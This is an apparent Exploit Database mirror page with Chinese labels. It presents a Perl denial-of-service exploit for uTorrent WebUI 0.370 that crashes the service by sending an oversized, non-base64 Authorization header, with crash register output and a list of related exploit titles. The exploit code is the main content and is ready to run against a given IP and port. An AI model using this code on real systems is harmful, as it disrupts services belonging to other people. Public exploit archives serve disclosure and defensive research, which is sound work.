μTorrent (uTorrent) WebUI 0.370 – Authorisation Header Denial of Service

Exploit Database
17 阅读

作者： zombiefx darkernet

日期： 2010-04-02
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/12010/

#!/usr/bin/perl
# Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit
# Date: 2010-04-01
# Author: zombiefx darkernet[at]gmail.com<http://gmail.com>
# Version: µTorrent 2.0 (build 18488) / WebUI <=v0.370
# Tested on: Windows XP SP3
#Code:
# lame usage: ./UTweb.pl <IP> <PORT>
# EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94
# EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62
# Good luck! corelanc0d3r

use warnings;
use strict;
use IO::Socket;
my $nonbase64 = "\x41" x 1000; # That was pointless
my $sock = IO::Socket::INET->new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => 'tcp');
print $sock "GET / HTTP/1.1\r\n".
"Authorization: Basic $nonbase64\r\n\r\n";

last Exploits
μTorrent (uTorrent) WebUI 0.370 – Authorisation Header Denial of Service的更多信息

Intel Indeo – Video Memory Corruption：
Microsoft Windows – ‘USP10!otlReverseChainingLookup::apply’ Uniscribe Font Processing Out-of-Bounds Memory Read：
Microsoft Windows Kernel – Bitmap Handling Use-After-Free (MS15-061) (2)：
Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'：
Claymore Dual GPU Miner 10.5 – Format String：
Linux Kernel 3.0.0 – ‘perf_count_sw_cpu_clock’ event Denial of Service：
Samsung Galaxy S6 – ‘android.media.process’ ‘MdConvertLine’ Face Recognition Memory Corruption：
Systematic SitAware – NVG Denial of Service：